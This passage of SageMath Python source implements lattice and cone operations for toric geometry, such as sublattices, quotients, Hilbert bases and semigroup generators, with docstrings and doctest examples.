Let `\sigma` be the given cone and `N=` ``self.lattice()`` the
ambient lattice. Then, in the notation of [Ful1993]_, this
method returns the sublattice
.. MATH::
N_\sigma \stackrel{\text{def}}{=} \mathop{span}( N\cap \sigma )
INPUT:
- either nothing or something that can be turned into an element of
this lattice.
OUTPUT:
- if no arguments were given, a :class:`toric sublattice
<sage.geometry.toric_lattice.ToricLattice_sublattice_with_basis>`,
otherwise the corresponding element of it.
.. NOTE::
* The sublattice spanned by the cone is the saturation of
the sublattice generated by the rays of the cone.
* If you only need a `\QQ`-basis, you may want to try the
:meth:`~sage.geometry.point_collection.PointCollection.basis`
method on the result of :meth:`~IntegralRayCollection.rays`.
* The returned lattice points are usually not rays of the
cone. In fact, for a non-smooth cone the rays do not
generate the sublattice `N_\sigma`, but only a finite
index sublattice.
EXAMPLES::
sage: cone = Cone([(1, 1, 1), (1, -1, 1), (-1, -1, 1), (-1, 1, 1)])
sage: cone.rays().basis()
N( 1, 1, 1),
N( 1, -1, 1),
N(-1, -1, 1)
in 3-d lattice N
sage: cone.rays().basis().matrix().det()
-4
sage: cone.sublattice()
Sublattice <N(1, 1, 1), N(0, -1, 0), N(-1, -1, 0)>
sage: matrix( cone.sublattice().gens() ).det()
-1
Another example::
sage: c = Cone([(1,2,3), (4,-5,1)])
sage: c
2-d cone in 3-d lattice N
sage: c.rays()
N(1, 2, 3),
N(4, -5, 1)
in 3-d lattice N
sage: c.sublattice()
Sublattice <N(4, -5, 1), N(1, 2, 3)>
sage: c.sublattice(5, -3, 4)
N(5, -3, 4)
sage: c.sublattice(1, 0, 0)
Traceback (most recent call last):
...
TypeError: element [1, 0, 0] is not in free module
"""
if "_sublattice" not in self.__dict__:
self._split_ambient_lattice()
if args or kwds:
return self._sublattice(*args, **kwds)
else:
return self._sublattice
def sublattice_quotient(self, *args, **kwds):
r"""
The quotient of the ambient lattice by the sublattice spanned
by the cone.
INPUT:
- either nothing or something that can be turned into an element of
this lattice.
OUTPUT:
- if no arguments were given, a :class:`quotient of a toric lattice
<sage.geometry.toric_lattice.ToricLattice_quotient>`,
otherwise the corresponding element of it.
EXAMPLES::
sage: C2_Z2 = Cone([(1,0),(1,2)]) # C^2/Z_2
sage: c1, c2 = C2_Z2.facets()
sage: c2.sublattice_quotient()
1-d lattice, quotient of 2-d lattice N by Sublattice <N(1, 2)>
sage: N = C2_Z2.lattice()
sage: n = N(1,1)
sage: n_bar = c2.sublattice_quotient(n); n_bar
N[1, 1]
sage: n_bar.lift()
N(1, 1)
sage: vector(n_bar)
(-1)
"""
if "_sublattice_quotient" not in self.__dict__:
self._sublattice_quotient = self.lattice() / self.sublattice()
if args or kwds:
return self._sublattice_quotient(*args, **kwds)
else:
return self._sublattice_quotient
def sublattice_complement(self, *args, **kwds):
r"""
A complement of the sublattice spanned by the cone.
In other words, :meth:`sublattice` and
:meth:`sublattice_complement` together form a
`\ZZ`-basis for the ambient :meth:`lattice()
<sage.geometry.cone.IntegralRayCollection.lattice>`.
In the notation of [Ful1993]_, let `\sigma` be the given cone
and `N=` ``self.lattice()`` the ambient lattice. Then this
method returns
.. MATH::
N(\sigma) \stackrel{\text{def}}{=} N / N_\sigma
lifted (non-canonically) to a sublattice of `N`.
INPUT:
- either nothing or something that can be turned into an element of
this lattice.
OUTPUT:
- if no arguments were given, a :class:`toric sublattice
<sage.geometry.toric_lattice.ToricLattice_sublattice_with_basis>`,
otherwise the corresponding element of it.
EXAMPLES::
sage: C2_Z2 = Cone([(1,0),(1,2)]) # C^2/Z_2
sage: c1, c2 = C2_Z2.facets()
sage: c2.sublattice()
Sublattice <N(1, 2)>
sage: c2.sublattice_complement()
Sublattice <N(0, 1)>
A more complicated example::
sage: c = Cone([(1,2,3), (4,-5,1)])
sage: c.sublattice()
Sublattice <N(4, -5, 1), N(1, 2, 3)>
sage: c.sublattice_complement()
Sublattice <N(2, -3, 0)>
sage: m = matrix( c.sublattice().gens() + c.sublattice_complement().gens() )
sage: m
[ 4 -5 1]
[ 1 2 3]
[ 2 -3 0]
sage: m.det()
-1
"""
if "_sublattice_complement" not in self.__dict__:
self._split_ambient_lattice()
if args or kwds:
return self._sublattice_complement(*args, **kwds)
else:
return self._sublattice_complement
def orthogonal_sublattice(self, *args, **kwds):
r"""
The sublattice (in the dual lattice) orthogonal to the
sublattice spanned by the cone.
Let `M=` ``self.dual_lattice()`` be the lattice dual to the
ambient lattice of the given cone `\sigma`. Then, in the
notation of [Ful1993]_, this method returns the sublattice
.. MATH::
M(\sigma) \stackrel{\text{def}}{=}
\sigma^\perp \cap M
\subset M
INPUT:
- either nothing or something that can be turned into an element of
this lattice.
OUTPUT:
- if no arguments were given, a :class:`toric sublattice
<sage.geometry.toric_lattice.ToricLattice_sublattice_with_basis>`,
otherwise the corresponding element of it.
EXAMPLES::
sage: c = Cone([(1,1,1), (1,-1,1), (-1,-1,1), (-1,1,1)])
sage: c.orthogonal_sublattice()
Sublattice <>
sage: c12 = Cone([(1,1,1), (1,-1,1)])
sage: c12.sublattice()
Sublattice <N(1, 1, 1), N(0, -1, 0)>
sage: c12.orthogonal_sublattice()
Sublattice <M(1, 0, -1)>
TESTS:
We check that :trac:`24541` is fixed::
sage: c = Cone([(1,0)], lattice=ZZ^2)
sage: c.orthogonal_sublattice()
Free module of degree 2 and rank 1 over Integer Ring
User basis matrix:
[0 1]
sage: c.dual()
2-d cone in 2-d lattice
"""
if "_orthogonal_sublattice" not in self.__dict__:
try:
self._orthogonal_sublattice = self.sublattice_quotient().dual()
except AttributeError:
N = self.lattice()
basis = self.rays().basis()
Nsigma = column_matrix(ZZ, (N.coordinates(v) for v in basis))
D, U, V = Nsigma.smith_form() # D = U * Nsigma * V
M = self.dual_lattice()
self._orthogonal_sublattice = M.submodule_with_basis(
U.rows()[len(basis):])
if args or kwds:
return self._orthogonal_sublattice(*args, **kwds)
else:
return self._orthogonal_sublattice
def relative_quotient(self, subcone):
r"""
The quotient of the spanned lattice by the lattice spanned by
a subcone.
In the notation of [Ful1993]_, let `N` be the ambient lattice
and `N_\sigma` the sublattice spanned by the given cone
`\sigma`. If `\rho < \sigma` is a subcone, then `N_\rho` =
``rho.sublattice()`` is a saturated sublattice of `N_\sigma` =
``self.sublattice()``. This method returns the quotient
lattice. The lifts of the quotient generators are
`\dim(\sigma)-\dim(\rho)` linearly independent primitive
lattice points that, together with `N_\rho`, generate
`N_\sigma`.
OUTPUT:
- :class:`toric lattice quotient
<sage.geometry.toric_lattice.ToricLattice_quotient>`.
.. NOTE::
* The quotient `N_\sigma / N_\rho` of spanned sublattices
has no torsion since the sublattice `N_\rho` is saturated.
* In the codimension one case, the generator of
`N_\sigma / N_\rho` is chosen to be in the same direction as the
image `\sigma / N_\rho`
EXAMPLES::
sage: sigma = Cone([(1,1,1,3),(1,-1,1,3),(-1,-1,1,3),(-1,1,1,3)])
sage: rho = Cone([(-1, -1, 1, 3), (-1, 1, 1, 3)])
sage: sigma.sublattice()
Sublattice <N(1, 1, 1, 3), N(0, -1, 0, 0), N(-1, -1, 0, 0)>
sage: rho.sublattice()
Sublattice <N(-1, -1, 1, 3), N(0, 1, 0, 0)>
sage: sigma.relative_quotient(rho)
1-d lattice, quotient
of Sublattice <N(1, 1, 1, 3), N(0, -1, 0, 0), N(-1, -1, 0, 0)>
by Sublattice <N(1, 0, -1, -3), N(0, 1, 0, 0)>
sage: sigma.relative_quotient(rho).gens()
(N[1, 0, 0, 0],)
More complicated example::
sage: rho = Cone([(1, 2, 3), (1, -1, 1)])
sage: sigma = Cone([(1, 2, 3), (1, -1, 1), (-1, 1, 1), (-1, -1, 1)])
sage: N_sigma = sigma.sublattice()
sage: N_sigma
Sublattice <N(1, 2, 3), N(1, -1, 1), N(-1, -1, -2)>
sage: N_rho = rho.sublattice()
sage: N_rho
Sublattice <N(1, -1, 1), N(1, 2, 3)>
sage: sigma.relative_quotient(rho).gens()
(N[-1, -1, -2],)
sage: N = rho.lattice()
sage: N_sigma == N.span(N_rho.gens() + tuple(q.lift()
....: for q in sigma.relative_quotient(rho).gens()))
True
Sign choice in the codimension one case::
sage: sigma1 = Cone([(1, 2, 3), (1, -1, 1), (-1, 1, 1), (-1, -1, 1)]) # 3d
sage: sigma2 = Cone([(1, 1, -1), (1, 2, 3), (1, -1, 1), (1, -1, -1)]) # 3d
sage: rho = sigma1.intersection(sigma2)
sage: rho.sublattice()
Sublattice <N(1, -1, 1), N(1, 2, 3)>
sage: sigma1.relative_quotient(rho)
1-d lattice, quotient
of Sublattice <N(1, 2, 3), N(1, -1, 1), N(-1, -1, -2)>
by Sublattice <N(1, 2, 3), N(0, 3, 2)>
sage: sigma1.relative_quotient(rho).gens()
(N[-1, -1, -2],)
sage: sigma2.relative_quotient(rho).gens()
(N[0, 2, 1],)
"""
try:
cached_values = self._relative_quotient
except AttributeError:
self._relative_quotient = {}
cached_values = self._relative_quotient
try:
return cached_values[subcone]
except KeyError:
pass
Ncone = self.sublattice()
Nsubcone = subcone.sublattice()
extra_ray = None
if Ncone.dimension()-Nsubcone.dimension()==1:
extra_ray = set(self.rays().set() - subcone.rays().set()).pop()
Q = Ncone.quotient(Nsubcone, positive_point=extra_ray)
assert Q.is_torsion_free()
cached_values[subcone] = Q
return Q
def relative_orthogonal_quotient(self, supercone):
r"""
The quotient of the dual spanned lattice by the dual of the
supercone's spanned lattice.
In the notation of [Ful1993]_, if ``supercone`` = `\rho >
\sigma` = ``self`` is a cone that contains `\sigma` as a face,
then `M(\rho)` = ``supercone.orthogonal_sublattice()`` is a
saturated sublattice of `M(\sigma)` =
``self.orthogonal_sublattice()``. This method returns the
quotient lattice. The lifts of the quotient generators are
`\dim(\rho)-\dim(\sigma)` linearly independent M-lattice
lattice points that, together with `M(\rho)`, generate
`M(\sigma)`.
OUTPUT:
- :class:`toric lattice quotient
<sage.geometry.toric_lattice.ToricLattice_quotient>`.
If we call the output ``Mrho``, then
- ``Mrho.cover() == self.orthogonal_sublattice()``, and
- ``Mrho.relations() == supercone.orthogonal_sublattice()``.
.. NOTE::
* `M(\sigma) / M(\rho)` has no torsion since the sublattice
`M(\rho)` is saturated.
* In the codimension one case, (a lift of) the generator of
`M(\sigma) / M(\rho)` is chosen to be positive on `\sigma`.
EXAMPLES::
sage: rho = Cone([(1,1,1,3),(1,-1,1,3),(-1,-1,1,3),(-1,1,1,3)])
sage: rho.orthogonal_sublattice()
Sublattice <M(0, 0, 3, -1)>
sage: sigma = rho.facets()[1]
sage: sigma.orthogonal_sublattice()
Sublattice <M(0, 1, 1, 0), M(0, 0, 3, -1)>
sage: sigma.is_face_of(rho)
True
sage: Q = sigma.relative_orthogonal_quotient(rho); Q
1-d lattice, quotient
of Sublattice <M(0, 1, 1, 0), M(0, 0, 3, -1)>
by Sublattice <M(0, 0, 3, -1)>
sage: Q.gens()
(M[0, 1, 1, 0],)
Different codimension::
sage: rho = Cone([[1,-1,1,3],[-1,-1,1,3]])
sage: sigma = rho.facets()[0]
sage: sigma.orthogonal_sublattice()
Sublattice <M(1, 0, 2, -1), M(0, 1, 1, 0), M(0, 0, 3, -1)>
sage: rho.orthogonal_sublattice()
Sublattice <M(0, 1, 1, 0), M(0, 0, 3, -1)>
sage: sigma.relative_orthogonal_quotient(rho).gens()
(M[-1, 0, -2, 1],)
Sign choice in the codimension one case::
sage: sigma1 = Cone([(1, 2, 3), (1, -1, 1), (-1, 1, 1), (-1, -1, 1)]) # 3d
sage: sigma2 = Cone([(1, 1, -1), (1, 2, 3), (1, -1, 1), (1, -1, -1)]) # 3d
sage: rho = sigma1.intersection(sigma2)
sage: rho.relative_orthogonal_quotient(sigma1).gens()
(M[-5, -2, 3],)
sage: rho.relative_orthogonal_quotient(sigma2).gens()
(M[5, 2, -3],)
"""
try:
cached_values = self._relative_orthogonal_quotient
except AttributeError:
self._relative_orthogonal_quotient = {}
cached_values = self._relative_orthogonal_quotient
try:
return cached_values[supercone]
except KeyError:
pass
Mcone = self.orthogonal_sublattice()
Msupercone = supercone.orthogonal_sublattice()
extra_ray = None
if Mcone.dimension()-Msupercone.dimension()==1:
extra_ray = set(supercone.rays().set() - self.rays().set()).pop()
Q = Mcone.quotient(Msupercone, positive_dual_point=extra_ray)
assert Q.is_torsion_free()
cached_values[supercone] = Q
return Q
def semigroup_generators(self):
r"""
Return generators for the semigroup of lattice points of ``self``.
OUTPUT:
- a :class:`~sage.geometry.point_collection.PointCollection`
of lattice points generating the semigroup of lattice points
contained in ``self``.
.. note::
No attempt is made to return a minimal set of generators, see
:meth:`Hilbert_basis` for that.
EXAMPLES:
The following command ensures that the output ordering in the examples
below is independent of TOPCOM, you don't have to use it::
sage: PointConfiguration.set_engine('internal')
We start with a simple case of a non-smooth 2-dimensional cone::
sage: Cone([ (1,0), (1,2) ]).semigroup_generators()
N(1, 1),
N(1, 0),
N(1, 2)
in 2-d lattice N
A non-simplicial cone works, too::
sage: cone = Cone([(3,0,-1), (1,-1,0), (0,1,0), (0,0,1)])
sage: sorted(cone.semigroup_generators())
[N(0, 0, 1), N(0, 1, 0), N(1, -1, 0), N(1, 0, 0), N(3, 0, -1)]
GAP's toric package thinks this is challenging::
sage: cone = Cone([[1,2,3,4],[0,1,0,7],[3,1,0,2],[0,0,1,0]]).dual()
sage: len( cone.semigroup_generators() )
2806
The cone need not be strictly convex::
sage: halfplane = Cone([(1,0),(2,1),(-1,0)])
sage: sorted(halfplane.semigroup_generators())
[N(-1, 0), N(0, 1), N(1, 0)]
sage: line = Cone([(1,1,1),(-1,-1,-1)])
sage: sorted(line.semigroup_generators())
[N(-1, -1, -1), N(1, 1, 1)]
sage: wedge = Cone([ (1,0,0), (1,2,0), (0,0,1), (0,0,-1) ])
sage: sorted(wedge.semigroup_generators())
[N(0, 0, -1), N(0, 0, 1), N(1, 0, 0), N(1, 1, 0), N(1, 2, 0)]
Nor does it have to be full-dimensional (see :trac:`11312`)::
sage: Cone([(1,1,0), (-1,1,0)]).semigroup_generators()
N( 0, 1, 0),
N( 1, 1, 0),
N(-1, 1, 0)
in 3-d lattice N
Neither full-dimensional nor simplicial::
sage: A = matrix([(1, 3, 0), (-1, 0, 1), (1, 1, -2), (15, -2, 0)])
sage: A.elementary_divisors()
[1, 1, 1, 0]
sage: cone3d = Cone([(3,0,-1), (1,-1,0), (0,1,0), (0,0,1)])
sage: rays = ( A*vector(v) for v in cone3d.rays() )
sage: gens = Cone(rays).semigroup_generators(); sorted(gens)
[N(-2, -1, 0, 17),
N(0, 1, -2, 0),
N(1, -1, 1, 15),
N(3, -4, 5, 45),
N(3, 0, 1, -2)]
sage: set(map(tuple,gens)) == set( tuple(A*r) for r in cone3d.semigroup_generators() )
True
TESTS::
sage: len(Cone(identity_matrix(10).rows()).semigroup_generators())
10
sage: trivial_cone = cones.trivial(3)
sage: trivial_cone.semigroup_generators()
Empty collection
in 3-d lattice N
ALGORITHM:
If the cone is not simplicial, it is first triangulated. Each
simplicial subcone has the integral points of the spaned
parallelotope as generators. This is the first step of the
primal Normaliz algorithm, see [Normaliz]_. For each
simplicial cone (of dimension `d`), the integral points of the
open parallelotope
.. MATH::
par \langle x_1, \dots, x_d \rangle =
\ZZ^n \cap
\left\{
q_1 x_1 + \cdots +q_d x_d
:~
0 \leq q_i < 1
\right\}
are then computed [BK2001]_.
Finally, the union of the generators of all simplicial
subcones is returned.
"""
# if the cone is not simplicial, triangulate and run
# recursively
N = self.lattice()
if not self.is_simplicial():
from sage.geometry.triangulation.point_configuration \
import PointConfiguration
origin = self.nrays() # last one in pc
pc = PointConfiguration(tuple(self.rays()) + (N(0),), star=origin)
triangulation = pc.triangulate()
subcones = ( Cone(( self.ray(i) for i in simplex if i!=origin ),
lattice=N, check=False)
for simplex in triangulation )
gens = set()
for cone in subcones:
gens.update(cone.semigroup_generators())
return tuple(gens)
gens = list(parallelotope_points(self.rays(), N)) + list(self.rays())
gens = ( v for v in gens if gcd(v) == 1 )
return PointCollection(gens, N)
@cached_method
def Hilbert_basis(self):
r"""
Return the Hilbert basis of the cone.
Given a strictly convex cone `C\subset \RR^d`, the Hilbert
basis of `C` is the set of all irreducible elements in the
semigroup `C\cap \ZZ^d`. It is the unique minimal generating
set over `\ZZ` for the integral points `C\cap \ZZ^d`.
If the cone `C` is not strictly convex, this method finds the
(unique) minimal set of lattice points that need to be added
to the defining rays of the cone to generate the whole
semigroup `C\cap \ZZ^d`. But because the rays of the cone are
not unique nor necessarily minimal in this case, neither is
the returned generating set (consisting of the rays plus
additional generators).
See also :meth:`semigroup_generators` if you are not
interested in a minimal set of generators.
OUTPUT:
- a
:class:`~sage.geometry.point_collection.PointCollection`. The
rays of ``self`` are the first ``self.nrays()`` entries.
EXAMPLES:
The following command ensures that the output ordering in the examples
below is independent of TOPCOM, you don't have to use it::
sage: PointConfiguration.set_engine('internal')
We start with a simple case of a non-smooth 2-dimensional cone::
sage: Cone([ (1,0), (1,2) ]).Hilbert_basis()
N(1, 0),
N(1, 2),
N(1, 1)
in 2-d lattice N
Two more complicated example from GAP/toric::
sage: Cone([[1,0],[3,4]]).dual().Hilbert_basis()
M(0, 1),
M(4, -3),
M(1, 0),
M(2, -1),
M(3, -2)
in 2-d lattice M
sage: cone = Cone([[1,2,3,4],[0,1,0,7],[3,1,0,2],[0,0,1,0]]).dual()
sage: cone.Hilbert_basis() # long time
M(10, -7, 0, 1),
M(-5, 21, 0, -3),
M( 0, -2, 0, 1),
M(15, -63, 25, 9),
M( 2, -3, 0, 1),
M( 1, -4, 1, 1),
M( 4, -4, 0, 1),
M(-1, 3, 0, 0),
M( 1, -5, 2, 1),
M( 3, -5, 1, 1),
M( 6, -5, 0, 1),
M( 3, -13, 5, 2),
M( 2, -6, 2, 1),
M( 5, -6, 1, 1),
M( 8, -6, 0, 1),
M( 0, 1, 0, 0),
M(-2, 8, 0, -1),
M(10, -42, 17, 6),
M( 7, -28, 11, 4),
M( 5, -21, 9, 3),
M( 6, -21, 8, 3),
M( 5, -14, 5, 2),
M( 2, -7, 3, 1),
M( 4, -7, 2, 1),
M( 7, -7, 1, 1),
M( 0, 0, 1, 0),
M( 1, 0, 0, 0),
M(-1, 7, 0, -1),
M(-3, 14, 0, -2)
in 4-d lattice M
Not a strictly convex cone::
sage: wedge = Cone([ (1,0,0), (1,2,0), (0,0,1), (0,0,-1) ])
sage: sorted(wedge.semigroup_generators())
[N(0, 0, -1), N(0, 0, 1), N(1, 0, 0), N(1, 1, 0), N(1, 2, 0)]
sage: wedge.Hilbert_basis()
N(1, 2, 0),
N(1, 0, 0),
N(0, 0, 1),
N(0, 0, -1),
N(1, 1, 0)
in 3-d lattice N
Not full-dimensional cones are ok, too (see :trac:`11312`)::
sage: Cone([(1,1,0), (-1,1,0)]).Hilbert_basis()
N( 1, 1, 0),
N(-1, 1, 0),
N( 0, 1, 0)
in 3-d lattice N
ALGORITHM:
The primal Normaliz algorithm, see [Normaliz]_.
"""
if self.is_strictly_convex():
def not_in_linear_subspace(x):
return True
else:
linear_subspace = self.linear_subspace()
def not_in_linear_subspace(x):
# "x in linear_subspace" does not work, due to absence
# of coercion maps as of Trac ticket #10513.
try:
linear_subspace(x)
return False
except (TypeError, ValueError):
return True
irreducible = list(self.rays()) # these are irreducible for sure
gens = list(self.semigroup_generators())
for x in irreducible:
try:
gens.remove(x)
except ValueError:
pass
while gens:
x = gens.pop()
if any(not_in_linear_subspace(y) and x-y in self
for y in irreducible+gens):
continue
irreducible.append(x)
if len(irreducible) == self.nrays():
return self.rays()
else:
return PointCollection(irreducible, self.lattice())
def Hilbert_coefficients(self, point, solver=None, verbose=0,
*, integrality_tolerance=1e-3):
r"""
Return the expansion coefficients of ``point`` with respect to
:meth:`Hilbert_basis`.
INPUT:
- ``point`` -- a :meth:`~IntegralRayCollection.lattice` point
in the cone, or something that can be converted to a
point. For example, a list or tuple of integers.
- ``solver`` -- (default: ``None``) Specify a Mixed Integer Linear Programming
(MILP) solver to be used. If set to ``None``, the default one is used. For
more information on MILP solvers and which default solver is used, see
the method
:meth:`solve <sage.numerical.mip.MixedIntegerLinearProgram.solve>`
of the class
:class:`MixedIntegerLinearProgram <sage.numerical.mip.MixedIntegerLinearProgram>`.
- ``verbose`` -- integer (default: ``0``). Sets the level of verbosity
of the LP solver. Set to 0 by default, which means quiet.
- ``integrality_tolerance`` -- parameter for use with MILP solvers over an
inexact base ring; see :meth:`MixedIntegerLinearProgram.get_values`.
OUTPUT:
A `\ZZ`-vector of length ``len(self.Hilbert_basis())`` with nonnegative
components.
.. note::
Since the Hilbert basis elements are not necessarily linearly
independent, the expansion coefficients are not unique. However,
this method will always return the same expansion coefficients when
invoked with the same argument.
EXAMPLES::
sage: cone = Cone([(1,0),(0,1)])
sage: cone.rays()
N(1, 0),
N(0, 1)
in 2-d lattice N
sage: cone.Hilbert_coefficients([3,2])
(3, 2)
A more complicated example::
sage: N = ToricLattice(2)
sage: cone = Cone([N(1,0),N(1,2)])
sage: cone.Hilbert_basis()
N(1, 0),
N(1, 2),
N(1, 1)
in 2-d lattice N
sage: cone.Hilbert_coefficients( N(1,1) )
(0, 0, 1)
The cone need not be strictly convex::
sage: N = ToricLattice(3)
sage: cone = Cone([N(1,0,0),N(1,2,0),N(0,0,1),N(0,0,-1)])
sage: cone.Hilbert_basis()
N(1, 2, 0),
N(1, 0, 0),
N(0, 0, 1),
N(0, 0, -1),
N(1, 1, 0)
in 3-d lattice N
sage: cone.Hilbert_coefficients( N(1,1,3) )
(0, 0, 3, 0, 1)
"""
point = self.lattice()(point)
if point not in self:
raise ValueError('The given point is not in the cone!')
basis = self.Hilbert_basis()
from sage.numerical.mip import MixedIntegerLinearProgram
p = MixedIntegerLinearProgram(maximization=False, solver=solver)
p.set_objective(None)
x = p.new_variable(integer=True, nonnegative=True)
for i in range(self.lattice_dim()):
p.add_constraint(p.sum(b[i]*x[j] for j,b in enumerate(basis)) == point[i])
p.solve(log=verbose)
return vector(ZZ, p.get_values(x, convert=ZZ, tolerance=integrality_tolerance))
def is_solid(self):
r"""
Check if this cone is solid.
A cone is said to be solid if it has nonempty interior. That
is, if its extreme rays span the entire ambient space.
An alias is :meth:`is_full_dimensional`.
OUTPUT:
``True`` if this cone is solid, and ``False`` otherwise.
.. SEEALSO::
:meth:`is_proper`
EXAMPLES:
The nonnegative orthant is always solid::
sage: quadrant = cones.nonnegative_orthant(2)
sage: quadrant.is_solid()
True
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: octant.is_solid()
True
However, if we embed the two-dimensional nonnegative quadrant
into three-dimensional space, then the resulting cone no longer
has interior, so it is not solid::
sage: quadrant = Cone([(1,0,0), (0,1,0)])
sage: quadrant.is_solid()
False
TESTS:
A closed convex cone is solid if and only if its dual is
strictly convex::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8)
sage: K.is_solid() == K.dual().is_strictly_convex()
True
"""
return (self.dim() == self.lattice_dim())
is_full_dimensional = is_solid
def is_proper(self):
r"""
Check if this cone is proper.
A cone is said to be proper if it is closed, convex, solid,
and contains no lines. This cone is assumed to be closed and
convex; therefore it is proper if it is solid and contains no
lines.
OUTPUT:
``True`` if this cone is proper, and ``False`` otherwise.
.. SEEALSO::
:meth:`is_strictly_convex`, :meth:`is_solid`
EXAMPLES:
The nonnegative orthant is always proper::
sage: quadrant = cones.nonnegative_orthant(2)
sage: quadrant.is_proper()
True
sage: octant = Cone([(1,0,0), (0,1,0), (0,0,1)])
sage: octant.is_proper()
True
However, if we embed the two-dimensional nonnegative quadrant
into three-dimensional space, then the resulting cone no longer
has interior, so it is not solid, and thus not proper::
sage: quadrant = Cone([(1,0,0), (0,1,0)])
sage: quadrant.is_proper()
False
Likewise, a half-space contains at least one line, so it is not
proper::
sage: halfspace = Cone([(1,0),(0,1),(-1,0)])
sage: halfspace.is_proper()
False
"""
return (self.is_strictly_convex() and self.is_solid())
def is_full_space(self):
r"""
Check if this cone is equal to its ambient vector space.
An alias is :meth:`is_universe`.
OUTPUT:
``True`` if this cone equals its entire ambient vector
space and ``False`` otherwise.
EXAMPLES:
A single ray in two dimensions is not equal to the entire
space::
sage: K = Cone([(1,0)])
sage: K.is_full_space()
False
Neither is the nonnegative orthant::
sage: K = cones.nonnegative_orthant(2)
sage: K.is_full_space()
False
The right half-space contains a vector subspace, but it is
still not equal to the entire space::
sage: K = Cone([(1,0),(-1,0),(0,1)])
sage: K.is_full_space()
False
However, if we allow conic combinations of both axes, then
the resulting cone is the entire two-dimensional space::
sage: K = Cone([(1,0),(-1,0),(0,1),(0,-1)])
sage: K.is_full_space()
True
"""
return self.linear_subspace() == self.lattice().vector_space()
is_universe = is_full_space
def lineality(self):
r"""
Return the lineality of this cone.
The lineality of a cone is the dimension of the largest linear
subspace contained in that cone.
OUTPUT:
A nonnegative integer; the dimension of the largest subspace
contained within this cone.
REFERENCES:
- [Roc1970]_
EXAMPLES:
The lineality of the nonnegative orthant is zero, since it clearly
contains no lines::
sage: K = cones.nonnegative_orthant(3)
sage: K.lineality()
0
However, if we add another ray so that the entire `x`-axis belongs
to the cone, then the resulting cone will have lineality one::
sage: K = Cone([(1,0,0), (-1,0,0), (0,1,0), (0,0,1)])
sage: K.lineality()
1
If our cone is all of `\mathbb{R}^{2}`, then its lineality is equal
to the dimension of the ambient space (i.e. two)::
sage: K = Cone([(1,0), (-1,0), (0,1), (0,-1)])
sage: K.is_full_space()
True
sage: K.lineality()
2
sage: K.lattice_dim()
2
Per the definition, the lineality of the trivial cone in a trivial
space is zero::
sage: K = cones.trivial(0)
sage: K.lineality()
0
TESTS:
The lineality of a cone should be an integer between zero and the
dimension of the ambient space, inclusive::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8)
sage: l = K.lineality()
sage: l in ZZ
True
sage: 0 <= l <= K.lattice_dim()
True
A strictly convex cone should have lineality zero::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim = 8, strictly_convex = True)
sage: K.lineality()
0
"""
return self.linear_subspace().dimension()
def is_relatively_open(self):
r"""
Return whether ``self`` is relatively open.
OUTPUT:
Boolean.
EXAMPLES::
sage: K = cones.nonnegative_orthant(3)
sage: K.is_relatively_open()
False
sage: K1 = Cone([(1,0), (-1,0)]); K1
1-d cone in 2-d lattice N
sage: K1.is_relatively_open()
True
"""
return self.lineality() == self.dim()
@cached_method
def discrete_complementarity_set(self):
r"""
Compute a discrete complementarity set of this cone.
A discrete complementarity set of a cone is the set of all
orthogonal pairs `(x,s)` where `x` is in some fixed generating
set of the cone, and `s` is in some fixed generating set of its
dual. The generators chosen for this cone and its dual are
simply their :meth:`~IntegralRayCollection.rays`.
OUTPUT:
A tuple of pairs `(x,s)` such that,
* `x` and `s` are nonzero.
* `s(x)` is zero.
* `x` is one of this cone's :meth:`~IntegralRayCollection.rays`.
* `s` is one of the :meth:`~IntegralRayCollection.rays` of this
cone's :meth:`dual`.
REFERENCES:
- [Or2017]_
EXAMPLES:
Pairs of standard basis elements form a discrete complementarity
set for the nonnegative orthant::
sage: K = cones.nonnegative_orthant(2)
sage: K.discrete_complementarity_set()
((N(1, 0), M(0, 1)), (N(0, 1), M(1, 0)))
If a cone consists of a single ray, then the second components
of a discrete complementarity set for that cone should generate
the orthogonal complement of the ray::
sage: K = Cone([(1,0)])
sage: K.discrete_complementarity_set()
((N(1, 0), M(0, 1)), (N(1, 0), M(0, -1)))
sage: K = Cone([(1,0,0)])
sage: K.discrete_complementarity_set()
((N(1, 0, 0), M(0, 1, 0)),
(N(1, 0, 0), M(0, -1, 0)),
(N(1, 0, 0), M(0, 0, 1)),
(N(1, 0, 0), M(0, 0, -1)))
When a cone is the entire space, its dual is the trivial cone,
so the only discrete complementarity set for it is empty::
sage: K = Cone([(1,0),(-1,0),(0,1),(0,-1)])
sage: K.is_full_space()
True
sage: K.discrete_complementarity_set()
()
Likewise for trivial cones, whose duals are the entire space::
sage: cones.trivial(0).discrete_complementarity_set()
()
TESTS:
A discrete complementarity set for the dual can be obtained by
switching components in a discrete complementarity set of the
original cone::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: dcs_dual = K.dual().discrete_complementarity_set()
sage: expected = tuple( (x,s) for (s,x) in dcs_dual )
sage: actual = K.discrete_complementarity_set()
sage: sorted(actual) == sorted(expected)
True
The pairs in a discrete complementarity set are in fact
complementary::
sage: set_random_seed()
sage: K = random_cone(max_ambient_dim=6)
sage: dcs = K.discrete_complementarity_set()
sage: sum( (s*x).abs() for (x,s) in dcs )
0
"""
# Return an immutable tuple instead of a mutable list because
# the result will be cached.
return tuple( (x,s) for x in self
for s in self.dual()
if s*x == 0 )
def lyapunov_like_basis(self):
r"""
Compute a basis of Lyapunov-like transformations on this cone.
A linear transformation `L` is said to be Lyapunov-like on this
cone if `L(x)` and `s` are orthogonal for every pair `(x,s)` in
its :meth:`discrete_complementarity_set`. The set of all such
transformations forms a vector space, namely the Lie algebra of
the automorphism group of this cone.
OUTPUT:
A list of matrices forming a basis for the space of all
Lyapunov-like transformations on this cone.
.. SEEALSO::
:meth:`cross_positive_operators_gens`,
:meth:`positive_operators_gens`,
:meth:`Z_operators_gens`
REFERENCES:
- [Or2017]_
- [RNPA2011]_
EXAMPLES:
Every transformation is Lyapunov-like on the trivial cone::
sage: K = cones.trivial(2)
sage: M = MatrixSpace(K.lattice().base_field(), K.lattice_dim())
sage: list(M.basis()) == K.lyapunov_like_basis()
True
And by duality, every transformation is Lyapunov-like on the
ambient space::
sage: K = Cone([(1,0), (-1,0), (0,1), (0,-1)])
sage: K.is_full_space()
True
sage: M = MatrixSpace(K.lattice().base_field(), K.lattice_dim())
sage: list(M.basis()) == K.lyapunov_like_basis()
True
However, in a trivial space, there are no non-trivial linear maps,
so there can be no Lyapunov-like basis::
